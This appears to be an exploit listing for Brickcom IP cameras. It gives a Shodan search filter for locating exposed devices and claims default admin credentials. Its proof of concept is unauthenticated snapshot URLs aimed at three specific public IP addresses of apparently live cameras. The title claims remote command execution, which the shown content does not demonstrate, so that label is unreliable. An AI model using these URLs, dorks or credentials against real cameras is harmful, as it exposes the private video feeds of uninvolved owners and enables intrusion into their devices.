Brickcom Camera - Remote command execution

2026.02.26

Credit: parsa rezaie khiabanloo

Risk: High

Local: No

Remote: Yes

CVE: N/A

CWE: N/A

Dork: In Shodan search engine, the filter is --> realm="Brickcom"

# Exploit Title: Exploit Title: Brickcom Camera - Remote command execution
# Date: 2/26/2026
# Google Dork : In Shodan search engine, the filter is --> realm="Brickcom"
# Exploit Author: parsa rezaie khiabanloo
# Tested on: Windows/Linux/Android

# 1. Description:

All Brickcom versions username and password are admin and they have RCE snapshot without authentication.

Exploit : /ONVIF/media.cgi?action=getSnapshot&amp;channel=1
Exploit : ONVIF/media.cgi?action=getSnapshot

# 2 . Proof of Concept:
Retrieve a camera snapshot without authentication:

 http://2.81.165.52:5000/ONVIF/media.cgi?action=getSnapshot&amp;channel=1

http://109.89.253.56:10001/ONVIF/media.cgi?action=getSnapshot

http://80.123.193.122:10101/ONVIF/media.cgi?action=getSnapshot

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

Brickcom Camera - Remote command execution

Dork: In Shodan search engine, the filter is --> realm="Brickcom"

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.